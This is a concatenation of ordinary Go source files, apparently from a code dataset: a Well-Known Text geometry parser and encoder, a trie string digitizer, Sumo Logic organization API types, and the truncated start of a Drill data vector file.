	return (&WKT{}).Decode(wkt)
}

// FromWKT parses the WKT string and stores the result in x.
// A nil receiver is a no-op.
func (x *Geometry) FromWKT(wkt string) error {
	if x == nil {
		return nil
	}
	g, err := NewGeometryFromWKT(wkt)
	if err != nil {
		return err
	}
	x.Geometry = g.Geometry
	return nil
}

// ToWKT serializes the geometry to its WKT representation.
func (x *Geometry) ToWKT() string {
	return (&WKT{}).Encode(x)
}
// WKT encodes and decodes geometries in the Well-Known Text format.
type WKT struct {
}

// Decode parses a WKT string into a Geometry.
func (w *WKT) Decode(wkt string) (*Geometry, error) {
	src := bufio.NewReader(strings.NewReader(wkt))
	return w.decode(&reader{Reader: src})
}

// Encode serializes a Geometry to its WKT string form.
func (w *WKT) Encode(geometry *Geometry) string {
	var buf bytes.Buffer
	return w.encode(&buf, geometry).string(&buf)
}
// decodePoint parses the body of a POINT: exactly one coordinate pair.
func (w *WKT) decodePoint(r *reader) (*Geometry, error) {
	pts, err := r.readPoints()
	if err != nil {
		return nil, err
	}
	switch len(pts) {
	case 0:
		return nil, r.newError("POINT", "cannot be empty")
	case 1:
		p := &Geometry{}
		p.SetValue(&Point{Coordinate: pts[0]})
		return p, nil
	default:
		return nil, r.newError("POINT", "too many points %d", len(pts))
	}
}

// decodeMultiPoint parses the body of a MULTIPOINT: any number of
// coordinate pairs.
func (w *WKT) decodeMultiPoint(r *reader) (*Geometry, error) {
	pts, err := r.readPoints()
	if err != nil {
		return nil, err
	}
	return NewMultiPointGeometryFrom(pts...), nil
}

// decodeLineString parses the body of a LINESTRING, which requires at
// least two points.
func (w *WKT) decodeLineString(r *reader) (*Geometry, error) {
	pts, err := r.readPoints()
	if err != nil {
		return nil, err
	}
	if len(pts) < 2 {
		return nil, r.newError("LINESTRING", "not enough points %d", len(pts))
	}
	return NewLineStringGeometry(pts...), nil
}
// decodeMultiLineString parses the body of a MULTILINESTRING: one or
// more lines, each with at least two points.
func (w *WKT) decodeMultiLineString(r *reader) (*Geometry, error) {
	lines, err := r.readLines()
	if err != nil {
		return nil, err
	}
	if len(lines) < 1 {
		return nil, r.newError("MULTILINESTRING", "not enough lines %d", len(lines))
	}
	lineStrings := make([]*LineString, 0, len(lines))
	for i, v := range lines {
		if len(v) < 2 {
			return nil, r.newError("MULTILINESTRING", "not enough points in LINESTRING[%d], %d", i, len(v))
		}
		lineStrings = append(lineStrings, &LineString{Coordinates: v})
	}
	return NewMultiLineStringGeometry(lineStrings...), nil
}

// decodePolygon parses the body of a POLYGON: one or more linear rings,
// each with at least four points, and closed (first point == last).
func (w *WKT) decodePolygon(r *reader) (*Geometry, error) {
	lines, err := r.readLines()
	if err != nil {
		return nil, err
	}
	if len(lines) < 1 {
		return nil, r.newError("POLYGON", "not enough lines %d", len(lines))
	}
	lineStrings := make([]*LineString, 0, len(lines))
	for i, v := range lines {
		n := len(v)
		if n < 4 {
			return nil, r.newError("POLYGON", "not enough points in linear-ring[%d], %d", i, len(v))
		}
		// closed rings are part of the spec
		if !v[0].Equal(v[n-1]) {
			return nil, r.newError("POLYGON", "linear-ring[%d] not closed", i)
		}
		lineStrings = append(lineStrings, &LineString{Coordinates: v})
	}
	return NewPolygonGeometry(lineStrings...), nil
}
// decodeMultiPolygon parses the body of a MULTIPOLYGON: one or more
// polygons, each consisting of closed linear rings of at least four
// points.
func (w *WKT) decodeMultiPolygon(r *reader) (*Geometry, error) {
	polys, err := r.readPolys()
	if err != nil {
		return nil, err
	}
	if len(polys) < 1 {
		return nil, r.newError("MULTIPOLYGON", "not enough polygons %d", len(polys))
	}
	polygons := make([]*Polygon, 0, len(polys))
	for ii, vv := range polys {
		rings := make([]*LineString, 0, len(vv))
		for i, v := range vv {
			n := len(v)
			if n < 4 {
				return nil, r.newError("MULTIPOLYGON", "not enough points in polygon[%d] linear-ring[%d], %d", ii, i, len(v))
			}
			// closed rings are part of the spec
			if !v[0].Equal(v[n-1]) {
				// Bug fix: the polygon/ring indices were swapped in the error
				// arguments (was i, ii) and the ring index used %v; match the
				// ordering of the length check above.
				return nil, r.newError("MULTIPOLYGON", "polygon[%d] linear-ring[%d] not closed", ii, i)
			}
			rings = append(rings, &LineString{Coordinates: v})
		}
		polygons = append(polygons, &Polygon{LineStrings: rings})
	}
	// err is necessarily nil here; return nil explicitly for clarity
	return NewMultiPolygonGeometry(polygons...), nil
}
// decodeGeometryCollection parses the body of a GEOMETRYCOLLECTION: a
// parenthesized, comma-separated list of full geometries, each parsed
// recursively via decode.
func (w *WKT) decodeGeometryCollection(r *reader) (*Geometry, error) {
	b, err := r.pop()
	if err != nil {
		return nil, err
	}
	if b != '(' {
		return nil, r.expect("(")
	}
	_, err = r.skipSpaces()
	if err != nil {
		return nil, err
	}
	geoms := make([]*Geometry, 0, 4)
	var geo *Geometry
	for b, err = r.pop(); b != ')' && err == nil; b, err = r.pop() {
		// the byte just popped belongs to the next geometry's tag
		r.unPop()
		geo, err = w.decode(r)
		if err != nil {
			return nil, err
		}
		geoms = append(geoms, geo)
		_, err = r.skipSpaces()
		if err != nil {
			return nil, err
		}
		b, err = r.pop()
		if err != nil {
			return nil, err
		}
		switch b {
		case ')':
			// leave the ')' for the loop condition to consume
			r.unPop()
		case ',':
			//noop
			_, err = r.skipSpaces()
			if err != nil {
				return nil, err
			}
		default:
			return nil, r.expect("',' or ')'")
		}
	}
	if err != nil {
		return nil, err
	}
	if len(geoms) < 1 {
		return nil, r.newError("GEOMETRYCOLLECTION", "not enough geometries %d", len(geoms))
	}
	if b != ')' {
		panic("unreachable")
	}
	return NewGeometryCollectionGeometry(geoms...), nil
}

// decode reads the next geometry tag and dispatches to the matching
// body parser. Tags are matched case-insensitively.
func (w *WKT) decode(r *reader) (*Geometry, error) {
	tag, err := r.readTag() // remove leading whitespaces
	if err != nil {
		return nil, err
	}
	_, err = r.skipSpaces()
	if err != nil {
		return nil, err
	}
	// readTag already lower-cases ASCII letters; ToLower is defensive
	switch strings.ToLower(tag) {
	case "point":
		return w.decodePoint(r)
	case "multipoint":
		return w.decodeMultiPoint(r)
	case "linestring":
		return w.decodeLineString(r)
	case "multilinestring":
		return w.decodeMultiLineString(r)
	case "polygon":
		return w.decodePolygon(r)
	case "multipolygon":
		return w.decodeMultiPolygon(r)
	case "geometrycollection":
		return w.decodeGeometryCollection(r)
	default:
		return nil, r.newError("GEOMETRY", "unknown type %q", tag)
	}
}
// writeLngLat appends a single "longitude latitude" pair to the buffer.
func (w *WKT) writeLngLat(buffer *bytes.Buffer, p *LngLat) *WKT {
	buffer.Grow(24)
	lon := strconv.FormatFloat(p.Longitude, 'f', -1, 64)
	lat := strconv.FormatFloat(p.Latitude, 'f', -1, 64)
	buffer.WriteString(lon)
	buffer.WriteByte(' ')
	buffer.WriteString(lat)
	return w
}

// writeLngLats appends "(x y,x y,...)" for a list of coordinates.
func (w *WKT) writeLngLats(buffer *bytes.Buffer, points ...*LngLat) *WKT {
	buffer.Grow(len(points) * 24)
	buffer.WriteByte('(')
	for i, p := range points {
		if i != 0 {
			buffer.WriteByte(',')
		}
		w.writeLngLat(buffer, p)
	}
	buffer.WriteByte(')')
	return w
}

// writeLines appends "((...),(...))" for a list of line strings.
func (w *WKT) writeLines(buffer *bytes.Buffer, lines ...*LineString) *WKT {
	buffer.Grow(len(lines) * 64)
	buffer.WriteByte('(')
	for i, line := range lines {
		if i != 0 {
			buffer.WriteByte(',')
		}
		w.writeLngLats(buffer, line.Coordinates...)
	}
	buffer.WriteByte(')')
	return w
}
// encodePoint writes "POINT (x y)" or "POINT EMPTY".
func (w *WKT) encodePoint(buffer *bytes.Buffer, p *Point) *WKT {
	buffer.Grow(32)
	buffer.WriteString("POINT ")
	if p.GetCoordinate().IsEmpty() {
		buffer.WriteString(Empty)
	} else {
		buffer.WriteByte('(')
		w.writeLngLat(buffer, p.Coordinate)
		buffer.WriteByte(')')
	}
	return w
}

// encodeMultiPoint writes "MULTIPOINT (x y,...)" or "MULTIPOINT EMPTY".
func (w *WKT) encodeMultiPoint(buffer *bytes.Buffer, multiPoint *MultiPoint) *WKT {
	count := len(multiPoint.Points)
	buffer.Grow(count * 24)
	buffer.WriteString("MULTIPOINT ")
	if count == 0 {
		buffer.WriteString(Empty)
		return w
	}
	w.writeLngLats(buffer, multiPoint.GetLngLats()...)
	return w
}

// encodeLineString writes "LINESTRING (x y,...)" or "LINESTRING EMPTY".
func (w *WKT) encodeLineString(buffer *bytes.Buffer, line *LineString) *WKT {
	count := len(line.Coordinates)
	buffer.Grow(count * 24)
	buffer.WriteString("LINESTRING ")
	if count == 0 {
		buffer.WriteString(Empty)
		return w
	}
	w.writeLngLats(buffer, line.Coordinates...)
	return w
}

// encodeMultiLineString writes "MULTILINESTRING ((...),...)" or
// "MULTILINESTRING EMPTY".
func (w *WKT) encodeMultiLineString(buffer *bytes.Buffer, multiLineString *MultiLineString) *WKT {
	count := len(multiLineString.LineStrings)
	buffer.Grow(count * 64)
	buffer.WriteString("MULTILINESTRING ")
	if count == 0 {
		buffer.WriteString(Empty)
		return w
	}
	w.writeLines(buffer, multiLineString.LineStrings...)
	return w
}

// encodePolygon writes "POLYGON ((...),...)" or "POLYGON EMPTY".
func (w *WKT) encodePolygon(buffer *bytes.Buffer, polygon *Polygon) *WKT {
	count := len(polygon.LineStrings)
	buffer.Grow(count * 64)
	buffer.WriteString("POLYGON ")
	if count == 0 {
		buffer.WriteString(Empty)
		return w
	}
	w.writeLines(buffer, polygon.LineStrings...)
	return w
}
// encodeMultiPolygon writes "MULTIPOLYGON (((...)),...)" or
// "MULTIPOLYGON EMPTY".
func (w *WKT) encodeMultiPolygon(buffer *bytes.Buffer, multiPolygon *MultiPolygon) *WKT {
	n := len(multiPolygon.Polygons)
	buffer.Grow(n * 256)
	buffer.WriteString("MULTIPOLYGON ")
	// Consistency fix: every other encoder emits the WKT EMPTY keyword
	// for zero elements; this one previously produced "MULTIPOLYGON ()",
	// which is not valid WKT.
	if n == 0 {
		buffer.WriteString(Empty)
		return w
	}
	buffer.WriteByte('(')
	for i, polygon := range multiPolygon.Polygons {
		if i > 0 {
			buffer.WriteByte(',')
		}
		w.writeLines(buffer, polygon.LineStrings...)
	}
	buffer.WriteByte(')')
	return w
}
// encodeGeometryCollection writes "GEOMETRYCOLLECTION (...)" with each
// member geometry encoded recursively, or "GEOMETRYCOLLECTION EMPTY".
func (w *WKT) encodeGeometryCollection(buffer *bytes.Buffer, collection *GeometryCollection) *WKT {
	geoms := collection.Geometries
	n := len(geoms)
	if n == 0 {
		buffer.WriteString("GEOMETRYCOLLECTION EMPTY")
		return w
	}
	buffer.Grow(n * 256)
	buffer.WriteString("GEOMETRYCOLLECTION (")
	for i, g := range geoms {
		if i > 0 {
			buffer.WriteByte(',')
		}
		w.encode(buffer, g)
	}
	buffer.WriteByte(')')
	return w
}

// encode dispatches on the concrete geometry variant and writes its WKT
// form to the buffer.
// NOTE(review): an unset/unknown variant writes nothing at all —
// confirm that silent no-op is intended.
func (w *WKT) encode(buffer *bytes.Buffer, geometry *Geometry) *WKT {
	switch gt := geometry.Geometry.(type) {
	case *Geometry_Point:
		return w.encodePoint(buffer, gt.Point)
	case *Geometry_MultiPoint:
		return w.encodeMultiPoint(buffer, gt.MultiPoint)
	case *Geometry_LineString:
		return w.encodeLineString(buffer, gt.LineString)
	case *Geometry_MultiLineString:
		return w.encodeMultiLineString(buffer, gt.MultiLineString)
	case *Geometry_Polygon:
		return w.encodePolygon(buffer, gt.Polygon)
	case *Geometry_MultiPolygon:
		return w.encodeMultiPolygon(buffer, gt.MultiPolygon)
	case *Geometry_GeometryCollection:
		return w.encodeGeometryCollection(buffer, gt.GeometryCollection)
	}
	return w
}

// string returns the accumulated buffer contents.
func (w *WKT) string(buffer *bytes.Buffer) string {
	return buffer.String()
}
// reader wraps a bufio.Reader and tracks row/column position while
// scanning a WKT string, for error reporting.
type reader struct {
	*bufio.Reader
	row    int
	column int
}

// peek returns the next byte without consuming it.
func (r *reader) peek() (byte, error) {
	bts, err := r.Peek(1)
	if err != nil {
		return ' ', err
	}
	return bts[0], nil
}

// pop consumes and returns the next byte, updating row/column.
// NOTE(review): '\r' and '\n' each bump the row, so a CRLF pair counts
// as two lines — confirm whether that is intended.
func (r *reader) pop() (byte, error) {
	b, err := r.ReadByte()
	if err == io.EOF {
		return b, r.newError("UNEXPECTED", "eof")
	}
	if b == '\n' || b == '\r' {
		r.row++
		r.column = 0
	} else {
		r.column++
	}
	return b, err
}

// unPop pushes the last popped byte back onto the reader.
// NOTE(review): when backing up over a newline the previous line's
// column length is unknown, so column is reset to 0.
func (r *reader) unPop() error {
	r.column--
	if r.column < 0 {
		r.column = 0
		r.row--
	}
	return r.UnreadByte()
}

// skipSpaces skips whitespaces and returns
// true if any characters were read
func (r *reader) skipSpaces() (bool, error) {
	var b byte
	var err error
	var skip bool
	for b, err = r.pop(); err == nil && isSpace(b); b, err = r.pop() {
		skip = true
	}
	if err != nil {
		return skip, err
	}
	// put the first non-space byte back for the caller
	r.unPop()
	return skip, nil
}
// readTag reads a run of ASCII letters (the geometry keyword), skipping
// leading whitespace. Letters are lower-cased as they are read.
func (r *reader) readTag() (string, error) {
	var tok strings.Builder
	tok.Grow(20)
	var err error
	var b byte
	_, err = r.skipSpaces()
	if err != nil {
		return "", err
	}
	for b, err = r.pop(); isAlpha(b) && err == nil; b, err = r.pop() {
		// ASCII upper -> lower (isAlpha guarantees b is a letter)
		if b < 'a' {
			b += 'a' - 'A'
		}
		tok.WriteByte(b)
	}
	if err != nil {
		return "", err
	}
	r.unPop()
	return tok.String(), nil
}

// readFloat reads a maximal run of numeric characters and parses it as
// a float64.
func (r *reader) readFloat() (float64, error) {
	var tok strings.Builder
	var err error
	var b byte
	tok.Grow(12)
	for b, err = r.pop(); err == nil && isNumeric(b); b, err = r.pop() {
		tok.WriteByte(b)
	}
	if err != nil {
		return 0, err
	}
	r.unPop()
	ret, err := strconv.ParseFloat(tok.String(), 64)
	if err != nil {
		return 0, r.newError("float", "cannot parse %q", tok.String())
	}
	return ret, nil
}

// readPoint reads a space separated tuple of floats, the inside
// of a wkt POINT
func (r *reader) readPoint() (*LngLat, error) {
	lon, err := r.readFloat()
	if err != nil {
		return nil, err
	}
	// at least one whitespace must separate longitude and latitude
	skip, err := r.skipSpaces()
	if err != nil {
		return nil, err
	}
	if !skip {
		return nil, r.expect("WHITESPACE")
	}
	lat, err := r.readFloat()
	return &LngLat{
		Longitude: lon,
		Latitude:  lat,
	}, err
}
// readPoints parses "(x y,x1 y1,...)" — a parenthesized, comma
// separated list of coordinate pairs.
// NOTE(review): an empty list "()" is a parse error here, so empty
// bodies are not accepted at this level.
func (r *reader) readPoints() ([]*LngLat, error) {
	b, err := r.pop()
	if err != nil {
		return nil, err
	}
	if b != '(' {
		return nil, r.expect("'('")
	}
	_, err = r.skipSpaces()
	if err != nil {
		return nil, err
	}
	pts := make([]*LngLat, 0, 8)
	for {
		pt, err := r.readPoint()
		if err != nil {
			return nil, err
		}
		pts = append(pts, pt)
		_, err = r.skipSpaces()
		if err != nil {
			return nil, err
		}
		b, err := r.pop()
		if err != nil {
			return nil, err
		}
		switch b {
		case ',':
			// more points follow
			_, err = r.skipSpaces()
			if err != nil {
				return nil, err
			}
			continue
		case ')':
			return pts, nil
		default:
			return nil, r.expect("',' or ')'")
		}
	}
}

// readLines parses "((...),(...))" — a parenthesized list of point
// lists. An immediately closed "()" yields a nil slice.
func (r *reader) readLines() ([][]*LngLat, error) {
	b, err := r.pop()
	if err != nil {
		return nil, err
	}
	if b != '(' {
		return nil, r.expect("(")
	}
	_, err = r.skipSpaces()
	if err != nil {
		return nil, err
	}
	b, err = r.pop()
	if err != nil {
		return nil, err
	}
	if b == ')' {
		return nil, nil
	}
	r.unPop()
	lines := make([][]*LngLat, 0, 4)
	var pts []*LngLat
	for {
		pts, err = r.readPoints()
		if err != nil {
			return nil, err
		}
		lines = append(lines, pts)
		_, err = r.skipSpaces()
		if err != nil {
			return nil, err
		}
		b, err = r.pop()
		if err != nil {
			return nil, err
		}
		switch b {
		case ',':
			// more lines follow
			_, err = r.skipSpaces()
			if err != nil {
				return nil, err
			}
			continue
		case ')':
			return lines, nil
		default:
			return nil, r.expect("',' or ')'")
		}
	}
}
// readPolys parses "(((...)),((...)))" — a parenthesized list of
// polygons, each itself a parenthesized list of linear rings. An
// immediately closed "()" yields a nil slice.
func (r *reader) readPolys() ([][][]*LngLat, error) {
	b, err := r.pop()
	if err != nil {
		return nil, err
	}
	if b != '(' {
		return nil, r.expect("(")
	}
	_, err = r.skipSpaces()
	if err != nil {
		return nil, err
	}
	b, err = r.pop()
	if err != nil {
		return nil, err
	}
	if b == ')' {
		return nil, nil
	}
	r.unPop()
	polys := make([][][]*LngLat, 0, 4)
	for {
		lines, err := r.readLines()
		if err != nil {
			return nil, err
		}
		polys = append(polys, lines)
		_, err = r.skipSpaces()
		if err != nil {
			return nil, err
		}
		b, err = r.pop()
		if err != nil {
			return nil, err
		}
		switch b {
		case ',':
			// more polygons follow
			_, err = r.skipSpaces()
			if err != nil {
				return nil, err
			}
			continue
		case ')':
			return polys, nil
		default:
			return nil, r.expect("',' or ')'")
		}
	}
}
// expect re-reads the byte that just failed a check and reports what
// was expected instead.
func (r *reader) expect(chars string) error {
	// back up so we can re-pop the offending byte
	r.unPop()
	b, err := r.pop()
	if err != nil {
		// this shouldn't happen
		return err
	}
	return r.newError(
		"expect",
		"one of `%q` got %q",
		chars,
		b,
	)
}

// newError builds a parseError pinned at the reader's current position.
func (r *reader) newError(typ string, format string, v ...interface{}) error {
	return &parseError{
		row:  r.row,
		char: r.column,
		typ:  typ,
		why:  fmt.Sprintf(format, v...),
	}
}
// parseError describes a WKT syntax error together with the position at
// which it occurred.
type parseError struct {
	row  int
	char int
	typ  string
	why  string
}

// Error implements the error interface; positions are reported 1-based.
func (e *parseError) Error() string {
	line, col := e.row+1, e.char+1
	return fmt.Sprintf("syntax error at <line %d, char %d>: %s : %s", line, col, e.typ, e.why)
}
// isAlpha reports whether b is an ASCII letter.
func isAlpha(b byte) bool {
	switch {
	case 'a' <= b && b <= 'z':
		return true
	case 'A' <= b && b <= 'Z':
		return true
	default:
		return false
	}
}
// isNumeric reports whether b may appear inside a WKT numeric token:
// digits, sign, decimal point, or an exponent marker.
//
// Fix: strconv.ParseFloat accepts both 'e' and 'E' exponent markers and
// an explicit '+' sign, but previously only uppercase 'E' was
// recognized, so values such as "1e5" failed to tokenize.
func isNumeric(b byte) bool {
	switch {
	case b >= '0' && b <= '9':
		return true
	case b == '-' || b == '+' || b == '.':
		return true
	// b == ',' is technically part of the spec,
	// but even postgis does not support it
	case b == 'e' || b == 'E':
		return true
	}
	return false
}
// isSpace reports whether b is an ASCII whitespace character.
func isSpace(b byte) bool {
	if b == '\t' ||
		b == '\n' ||
		b == '\v' ||
		b == '\f' ||
		b == '\r' ||
		b == ' ' {
		return true
	}
	return false
} | go/pkg/mojo/geom/wkt.go | 0.78838 | 0.419588 | wkt.go | starcoder |
package trie
import "strings"
// Digitizer maps elements to sequences of integer digits in a fixed
// base, for use by digit-based structures such as tries.
type Digitizer interface {
	// Base returns the base for the Digitizer.
	Base() int
	// IsPrefixFree returns true if and only if the Digitizer guarantees that no element is a prefix of another.
	IsPrefixFree() bool
	// NumDigitsOf returns the number of digits in the provided element.
	NumDigitsOf(element interface{}) int
	// DigitOf returns the element of digit place for the provided element.
	DigitOf(element interface{}, place int) int
	// FormatDigit returns a string representation of the digit in the place specified for the given element.
	FormatDigit(element interface{}, place int) string
}

// stringDigitizer digitizes ASCII strings: digit 0 is the end-of-string
// marker and 'a'..'z' map to 1..26.
type stringDigitizer struct {
	base int
}
// NewStringDigitizer creates a new Digitizer for strings with the
// provided alphabet size. The base is alphabetSize+1 so digit 0 can be
// reserved for the end-of-string marker.
func NewStringDigitizer(alphabetSize int) Digitizer {
	return &stringDigitizer{base: alphabetSize + 1}
}

// Base returns the base of the alphabet, which includes the
// end-of-string character.
func (d *stringDigitizer) Base() int {
	return d.base
}

// IsPrefixFree reports true: the trailing end-of-string digit
// guarantees no element is a prefix of another.
func (d *stringDigitizer) IsPrefixFree() bool {
	return true
}

// NumDigitsOf returns the number of digits in the provided string,
// counting the implicit end-of-string character.
func (d *stringDigitizer) NumDigitsOf(element interface{}) int {
	s := element.(string)
	return len(s) + 1
}

// DigitOf maps the character at the given place to an integer digit:
// 0 for the end-of-string position, otherwise 1..26 for 'a'..'z'.
// NOTE(review): non-letter bytes yield out-of-range digits — confirm
// inputs are validated upstream.
func (d *stringDigitizer) DigitOf(element interface{}, place int) int {
	s := element.(string)
	if place >= len(s) {
		return 0
	}
	return int(strings.ToLower(s)[place] - 'a' + 1)
}
// FormatDigit returns a string representation of the digit in the place specified for the given element where '#' is
// used for the end of string character.
func (d *stringDigitizer) FormatDigit(element interface{}, place int) string {
	if place >= len(element.(string)) {
		return "#"
	} else {
		return string(strings.ToLower(element.(string))[place])
	}
} | trie/digitizer.go | 0.859472 | 0.638117 | digitizer.go | starcoder |
package types
import "github.com/antihax/optional"
// Baselines describes the expected daily ingest volumes for a child org.
type Baselines struct {
	// The average daily amount of continuous logs this child org is expected to ingest, in GB.
	ContinuousIngest int64 `json:"continuousIngest,omitempty"`
	// The average daily amount of frequent logs this child org is expected to ingest, in GB.
	FrequentIngest int64 `json:"frequentIngest,omitempty"`
	// The average daily amount of infrequent logs this child org is expected to ingest, in GB.
	InfrequentIngest int64 `json:"infrequentIngest,omitempty"`
	// The average daily amount of metrics this child org is expected to ingest, in DPMs(Data points per minute).
	Metrics int64 `json:"metrics,omitempty"`
	// The average daily amount of tracing data this child org is expected to ingest, in GB. This is currently not available for all customers. It will be enabled only if available for your organization. Please contact your Sumo Logic account team to learn more.
	TracingIngest int64 `json:"tracingIngest,omitempty"`
}

// BasicUsage summarizes credit usage for a single organization.
type BasicUsage struct {
	// The amount of credits used by the organization in form of deployment charge.
	DeploymentChargeCreditsUsed float64 `json:"deploymentChargeCreditsUsed"`
	// The amount of credits used by the organization excluding deployment charge.
	AllocatedCreditsUsed float64 `json:"allocatedCreditsUsed"`
	// The unique identifier of an organization. It consists of the deployment ID and the hexadecimal account ID separated by a dash `-` character.
	OrgId string `json:"orgId"`
	// Denotes the total number of credits provisioned for the child organization to use.
	TotalCapacity float64 `json:"totalCapacity"`
	// Denotes the total number of credits that have been utilized.
	TotalCreditsUsed float64 `json:"totalCreditsUsed"`
}

// CreditsSubscription describes a credits-based subscription contract.
type CreditsSubscription struct {
	// Start date of the contract.
	StartDate string `json:"startDate"`
	// End date of the contract.
	EndDate string `json:"endDate"`
	// Status of the subscription.
	Status string `json:"status"`
	Plan   *Plan  `json:"plan"`
	// The total number of credits allocated to the organization.
	Credits int64 `json:"credits"`
	// The number of credits allocated to the organization in form of deployment charge.
	DeploymentChargeCredits int64 `json:"deploymentChargeCredits,omitempty"`
	// The number of credits allocated to the organization excluding deployment charge.
	AllocatedCredits int64      `json:"allocatedCredits,omitempty"`
	Baselines        *Baselines `json:"baselines"`
}

// Deployment identifies a Sumo Logic deployment region and its URLs.
type Deployment struct {
	// Identifier of the deployment.
	DeploymentId string `json:"deploymentId"`
	// The URL to interact with the Sumo Logic service on the corresponding deployment.
	ServiceUrl string `json:"serviceUrl,omitempty"`
	// URL to interact with Sumo Logic APIs on the corresponding deployment.
	ApiUrl string `json:"apiUrl,omitempty"`
}

// DeploymentCharge describes the surcharge applied to a child org in a
// given deployment region.
type DeploymentCharge struct {
	// Identifier of the deployment for the child org for which deployment charge is applied.
	DeploymentId string `json:"deploymentId,omitempty"`
	// Deployment charge is a charge that applies to child orgs deployed in different regions. This number is a percentage applied to the total credits being allocated to the child org.
	DeploymentCharge float64 `json:"deploymentCharge,omitempty"`
}

// DetailedUsage breaks down credit usage per product variable.
type DetailedUsage struct {
	// The amount of credits used by the organization in form of deployment charge.
	DeploymentChargeCreditsUsed float64 `json:"deploymentChargeCreditsUsed"`
	// The amount of credits used by the organization excluding deployment charge.
	AllocatedCreditsUsed float64 `json:"allocatedCreditsUsed"`
	// Contains details of the credits used per product variable.
	Usages []UsagePerProductVariable `json:"usages"`
	// Denotes the total number of credits provisioned for the child organization to use.
	TotalCapacity float64 `json:"totalCapacity"`
	// Denotes the total number of credits that have been utilized.
	TotalCreditsUsed float64 `json:"totalCreditsUsed"`
}

// ListOrganizationsOpts holds optional parameters for listing organizations.
type ListOrganizationsOpts struct {
	Limit  optional.Int32
	Token  optional.String
	Status optional.String
}

// ListOrganizationResponse is one page of organizations with
// subscription details.
type ListOrganizationResponse struct {
	// List of organizations with subscription details.
	Data []ReadOrganizationResponse `json:"data"`
	// Next continuation token.
	Next string `json:"next,omitempty"`
}

// ListUsagesResponse is one page of per-organization usage summaries.
type ListUsagesResponse struct {
	// Usage details of the requested organizations.
	Data []BasicUsage `json:"data"`
	// Next continuation token.
	Next string `json:"next,omitempty"`
}

// OrganizationsUsagesOpts holds optional parameters for listing usages.
type OrganizationsUsagesOpts struct {
	Limit optional.Int32
	Token optional.String
}

// OrganizationWithSubscriptionDetails is the request payload for
// creating a child organization.
type OrganizationWithSubscriptionDetails struct {
	// Identifier of the deployment in which the organization should be created.
	DeploymentId string `json:"deploymentId"`
	// Specify the duration of the Trial plan. If not specified, your subscription plan will be used for the created organization.
	TrialPlanPeriod int32      `json:"trialPlanPeriod,omitempty"`
	Baselines       *Baselines `json:"baselines,omitempty"`
	// Email address of the account owner.
	Email string `json:"email"`
	// Name of the organization.
	OrganizationName string `json:"organizationName"`
	// First name of the account owner.
	FirstName string `json:"firstName"`
	// Last name of the account owner.
	LastName string `json:"lastName,omitempty"`
}

// ParentOrgInfo describes the parent organization's entitlements for
// managing child organizations.
type ParentOrgInfo struct {
	// Tells whether the parent org can set up trial child orgs subscriptions.
	IsEligibleForTrialOrgs bool `json:"isEligibleForTrialOrgs,omitempty"`
	// Tells whether the org is subject to deployment charges.
	IsEligibleForDeploymentCharge bool `json:"isEligibleForDeploymentCharge,omitempty"`
	// List of deployment charges for the customer for setting up child org in each deployment.
	DeploymentCharges []DeploymentCharge `json:"deploymentCharges,omitempty"`
	// Plan name of the account.
	PlanName string `json:"planName,omitempty"`
}

// ParentUsage summarizes a parent organization's credit allocation.
type ParentUsage struct {
	// Denotes the total number of credits that have been allocated to the child organizations.
	CreditsAllocated float64 `json:"creditsAllocated"`
	// Denotes the total number of credits provisioned for the child organization to use.
	TotalCapacity float64 `json:"totalCapacity"`
	// Denotes the total number of credits that have been utilized.
	TotalCreditsUsed float64 `json:"totalCreditsUsed"`
}

// Plan names a subscription plan.
type Plan struct {
	// Name of the subscription plan.
	PlanName string `json:"planName"`
}

// ReadOrganizationResponse is a single organization with its
// subscription details.
type ReadOrganizationResponse struct {
	Subscription *CreditsSubscription `json:"subscription"`
	// The unique identifier of an organization. It consists of the deployment ID and the hexadecimal account ID separated by a dash `-` character.
	OrgId string `json:"orgId"`
	// Identifier of the deployment in which the organization is present.
	DeploymentId string `json:"deploymentId,omitempty"`
	// Email address of the account owner.
	Email string `json:"email"`
	// Name of the organization.
	OrganizationName string `json:"organizationName"`
	// First name of the account owner.
	FirstName string `json:"firstName"`
	// Last name of the account owner.
	LastName string `json:"lastName,omitempty"`
}

// Subdomain carries an organization's subdomain login URL.
type Subdomain struct {
	// Subdomain login URL of the organization.
	SubdomainLoginUrl string `json:"subdomainLoginUrl"`
}

// UsagePerProductVariable details credit usage for one product variable.
type UsagePerProductVariable struct {
	// A Product Variable is a unique service performance feature that is tracked through credit utilization. Valid values are 'continuousIngest', 'frequentIngest', 'storage', 'metrics', 'infrequentScan', 'infrequentIngest', 'inFrequentStorage', 'cseIngest', 'cseStorage'.
	ProductVariable string `json:"productVariable"`
	// Denotes the total number of actual credits that have been used.
	CreditsUsed float64 `json:"creditsUsed"`
	// Denotes the total number of credits that have been used in form of deployment charges.
	DeploymentChargeCredits float64 `json:"deploymentChargeCredits"`
	// Denotes the total number of credits that have been used including deployment charges.
	CreditsDeducted float64 `json:"creditsDeducted"`
	// The native utilization of the product variable.
	Utilization float64 `json:"utilization"`
	// The unit in which the native utilization is measured.
	Unit string `json:"unit"`
} | service/cip/types/organization_types.go | 0.723016 | 0.563138 | organization_types.go | starcoder |
package data
import (
"encoding/binary"
"math"
"math/big"
"reflect"
"unsafe"
"github.com/factset/go-drill/internal/rpc/proto/common"
"github.com/factset/go-drill/internal/rpc/proto/exec/shared"
"google.golang.org/protobuf/proto"
)
//go:generate go run ../cmd/tmpl -data numeric.tmpldata vector_numeric.gen.go.tmpl type_traits_numeric.gen.go.tmpl numeric_vec_typemap.gen.go.tmpl
//go:generate go run ../cmd/tmpl -data numeric.tmpldata type_traits_numeric.gen_test.go.tmpl vector_numeric.gen_test.go.tmpl numeric_vec_typemap.gen_test.go.tmpl
// DataVector is the read-only interface over a deserialized Drill
// value vector.
type DataVector interface {
	// Len returns the number of values in the vector.
	Len() int
	// Value returns the value at index boxed in an interface{}.
	Value(index uint) interface{}
	// Type returns the reflect.Type of the values this vector yields.
	Type() reflect.Type
	// TypeLen returns the maximum length for variable-length types and
	// whether the type is variable-length at all.
	TypeLen() (int64, bool)
	// GetRawBytes returns the raw backing bytes of the vector.
	GetRawBytes() []byte
}

// NullableDataVector is a DataVector whose entries may be null.
type NullableDataVector interface {
	DataVector
	// IsNull reports whether the value at index is null.
	IsNull(index uint) bool
	// GetNullBytemap returns the per-value null bytemap.
	GetNullBytemap() []byte
}
// BitVector is a non-nullable vector of booleans, bit-packed LSB-first.
type BitVector struct {
	vector
	values []byte
	meta   *shared.SerializedField
}

// Type returns the reflect type of bool.
func (BitVector) Type() reflect.Type {
	return reflect.TypeOf(false)
}

